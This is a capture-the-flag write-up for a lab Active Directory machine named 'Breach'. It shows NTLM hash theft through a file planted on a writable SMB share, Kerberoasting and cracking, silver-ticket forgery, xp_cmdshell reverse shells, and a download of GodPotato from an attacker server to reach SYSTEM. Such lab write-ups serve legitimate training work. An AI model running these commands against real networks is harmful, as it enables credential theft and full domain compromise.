# Breach

## OVERVIEW

---

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766545042428/b6adff6c-840d-4000-a9be-d4064813b105.png align="center")

So we are given the machine IP and told that the user flag is in C:\\share\\transfer . Let’s scan the machine for open ports and services using Nmap

---

## ENUMERATION

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766545318947/bfb98bd1-aae9-446d-b02a-8660d3a3a93b.png align="left")

So As you can see many ports are open and we also got the Domain Name and Domain Controller also so update this information in **<mark>/etc/hosts</mark>**

Let’s first check SMB shares:

Since we have not gotten the username and password we will try with **Guest/Anonymous** Login  
I am using **smbmap** you can use **netexec** also

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766545779383/2a02e85f-33a6-4acd-8753-8c727a5b51df.png align="center")

We found 3 **shares** in which we have **Read Access** to Two shares and **READ,WRITE** access to one share.

Lets check out share using **smbclient**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766546435706/fab03cfe-b3a5-43d2-9e2c-5f55409db79c.png align="center")

On accessing share we found three directories in which two are empty and when we go to the **transfer** directories then there are 3 more user directories whose listing file permission is denied .

**Since we have Read and Write access on share we can steal NTLM creds by uploading the file in the share using smbclient**

---

## GETTING NTLM HASH

For this I am using [**ntlm \_theft**](https://github.com/Greenwolf/ntlm_theft.git) tool to generate the files.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766547149982/9ef6671b-ec3e-4371-bc99-4d0c222d7d5f.png align="center")

So we will use the icon file and move it to the directory where you will use smbclient from do change the icon file name to **shell.url** for readability.

First Turn On The Responder on another terminal using

```apache
sudo responder -I tun0 -wdv
```

Now Login to Smbclient again and go to transfer directory and put the shell.url inside it and wait for 2 minutes and you will get the NTLM hash of **Julia.Wong** user

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766548227048/100b01f3-66a3-41f8-b0b5-1995fa2dae66.png align="center")

Now save the hash in the hash.txt and use John The Ripper to crack the hash to get the password using rockyou.txt wordlist.

Now check if its valid or not using netexec

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766548540833/97478b07-f9ba-454b-92e0-9dc7958ff737.png align="center")

It is valid

---

## USER FLAG

**Now you can get your user.txt from the C:\\share\\transfer using smbclient and logined as Julia.Wong**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766552468445/635846fe-a0e9-4232-b715-b8e0c7bbac4b.png align="center")

---

## EXPLOITATION

Now As we got a valid user password so we can run **Bloodhound** to visualize relationships between the users, OU, groups etc

```apache
bloodhound-python -u 'julia.wong' -p 'JULIA-PASS' -d breach.vl -ns 10.129.13.42 -c ALL --zip
```

Now While doing enumeration in Bloodhound we find that there is one other kerberoastable account beside krbtgt which is **svc\_mssql**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766549302870/a83a9f77-8335-4681-9896-5177cd88386f.png align="center")

While Seeing The Node Info of svc\_mssql we find that its Admin Count=False which means we can create its ticket to impersonate high privileged user but first let’s find its password .

Since it is a Kerberoastable account we can use [**NetExec**](https://github.com/Pennyw0rth/NetExec) to get its hash and then crack it **OR** you can use Impacket-GetUserSPNs query.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766550192693/780b9aae-4f5c-44c7-b738-11b082b55d33.png align="center")

Crack the hash using John The Ripper and get the password for **svc\_mssql** and now verify it

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766550694970/3a628f18-3e37-41aa-8b9a-302986104783.png align="center")

Now we got the password for svc\_mssql let’s move on to the impersonation of high privileged user using ticketer.py of Impacket

```apache
ticketer.py -user svc_mssql -nthash NT-HASH -domain breach.vl -domain-sid DOMAIN-SID -spn SPN administrator
```

Replace NT-HASH by the hash which you will get by converting the svc\_mssql password using this website  
[https://hashes.com/en/generate/hash](https://hashes.com/en/generate/hash)

Replace DOMAIN-SID and SPN from the Bloodhound svc\_mssql node info.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766551608109/f66cb687-593c-4e2d-b4be-6a2f8a42358f.png align="left")

```apache
export KRB5CCNAME=administrator.ccache
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766552114805/a5a5e88a-ea6c-4a98-9fbe-c079f7f4d066.png align="center")

**Now we can enable xp cmdshell and use it to execute a reverse shell to get shell as breach\\svc\_mssql**

```apache
enable_xp_cmdshell

xp_cmdshell powershell-base64-rev-shell-payload
```

Use the reverse shell payload from [https://www.revshells.com/](https://www.revshells.com/) and start the listener

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766553309893/f9609f7a-2f72-4509-be53-4d3ee76727f4.png align="left")

---

## PRIVILEGE ESCALATION / ROOT FLAG

Lets see what privileges the user got

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766553608010/30bf0f12-e7ea-4a12-bb76-17ffc019f5c6.png align="center")

As you can see we have **SeImpersonatePrivilege Enabled**  
So we can use [**GodPotato**](https://github.com/BeichenDream/GodPotato/releases) and [**SweetPotato**](https://github.com/CCob/SweetPotato)

Use python server using

```apache
python3 -m http.server 8000
```

Now Import it into the shell using iwr in **C:\\Users\\svc\_mssql\\Documents**

```apache
iwr http://YOUR-IP:PORT/GodPotato-NET4.exe -OutFile GodPotato-NET4.exe
```

Now run

```apache
.\GodPotato-NET4.exe -cmd 'powershell-revshell-base64-cmd'               #be sure to change the port 
```

Now See In your Listener you will get the shell as NT Authority\\system and then get the root flag

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766556257327/8ab5a14c-d5c6-4121-9393-b1476fdb9862.png align="left")

## **WE FINALLY DID IT !!!! CHALLENGE SOLVED !!**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1766556425422/13071950-ab24-4d07-9a9e-662b2c9e661d.png align="center")

For Any Query Or Problem Either Leave A Comment Or Contact At [**reapsec.com**](http://reapsec.com/)

**THANKS FOR READING !!!**